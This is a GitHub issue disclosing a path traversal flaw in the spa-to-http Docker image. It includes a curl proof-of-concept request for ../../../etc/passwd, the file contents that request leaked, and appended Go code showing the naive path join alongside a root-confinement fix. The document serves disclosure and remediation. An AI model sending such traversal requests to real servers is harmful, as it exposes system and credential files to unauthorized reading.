devforth / spa-to-http

Lightweight zero-configuration SPA HTTP server. Serves SPA bundle on HTTP port so it plays well with Traefik out of the box. Compatible with Vue.js, React and Angular
MIT License

Path Traversal Vulnerability in devforth/spa-to-http #14

Open sunaley opened 4 months ago

sunaley commented 4 months ago

Description:

I have identified a path traversal vulnerability in the devforth/spa-to-http:latest Docker container. This vulnerability allows an attacker to access sensitive files on the container system.

Steps to Reproduce:

1. Run the Docker container:

    sudo docker run --rm -p 8888:8080 -d devforth/spa-to-http:latest

2. Execute the following curl command:

    curl --path-as-is http://127.0.0.1:8888/../../../etc/passwd

You will see the contents of the /etc/passwd file:

    root:x:0:0:root:/root:/bin/ash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/mail:/sbin/nologin
    news:x:9:13:news:/usr/lib/news:/sbin/nologin
    uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    man:x:13:15:man:/usr/man:/sbin/nologin
    postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
    cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
    ftp:x:21:21::/var/lib/ftp:/sbin/nologin
    sshd:x:22:22:sshd:/dev/null:/sbin/nologin
    at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
    squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
    xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
    games:x:35:35:games:/usr/games:/sbin/nologin
    cyrus:x:85:12::/usr/cyrus:/sbin/nologin
    vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
    ntp:x:123:123:NTP:/var/empty:/sbin/nologin
    smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
    guest:x:405:100:guest:/dev/null:/sbin/nologin
    nobody:x:65534:65534:nobody:/:/sbin/nologin

Expected Behavior:

The application should not allow access to files outside of the intended directory.

Actual Behavior:

The application allows traversal outside the intended directory, exposing sensitive files on the host system.

Environment:

Docker version: 24.0.7, build afdd53b
OS: Rocky Linux release 9.2 (Blue Onyx)

Additional Context:

Please address this vulnerability to prevent unauthorized access to sensitive files.

Thank you for your attention to this matter.
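The traversal in this report works because a request path such as `/../../../etc/passwd` (sent unsquashed by `curl --path-as-is`) is joined onto the bundle directory and resolved by the filesystem. The Go code below is an added example, not code from the spa-to-http project: it contrasts the naive join with a root-confinement check that rejects any path resolving outside the served directory. The root `/srv/dist` is a placeholder; `NaiveJoin`, `SafeJoin` and `Handler` are names chosen for this example.

```go
package main

import (
	"errors"
	"log"
	"net/http"
	"path/filepath"
	"strings"
)

// ErrOutsideRoot is returned for request paths that would escape the bundle directory.
var ErrOutsideRoot = errors.New("request path escapes served root")

// NaiveJoin is the pattern behind this class of bug: filepath.Join cleans the
// result, but ".." segments are resolved against root, so the caller ends up
// with an absolute path anywhere on the filesystem (e.g. /etc/passwd).
func NaiveJoin(root, reqPath string) string {
	return filepath.Join(root, reqPath)
}

// SafeJoin maps a decoded request path (r.URL.Path) onto a file under root and
// rejects anything that resolves outside it. Lexical only: symlinks inside the
// bundle are not checked here; resolve root with filepath.EvalSymlinks and
// keep symlinks out of the bundle if that matters for your deployment.
func SafeJoin(root, reqPath string) (string, error) {
	root = filepath.Clean(root)
	full := filepath.Join(root, filepath.FromSlash(reqPath))
	rel, err := filepath.Rel(root, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideRoot
	}
	return full, nil
}

// Handler serves the bundle from root, answering 404 for traversal attempts
// so the response gives no hint about what exists outside the bundle.
func Handler(root string) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		full, err := SafeJoin(root, r.URL.Path)
		if err != nil {
			http.NotFound(w, r)
			return
		}
		http.ServeFile(w, r, full)
	})
}

func main() {
	// Placeholder bundle directory; adjust to where the SPA build is copied.
	log.Fatal(http.ListenAndServe(":8080", Handler("/srv/dist")))
}
```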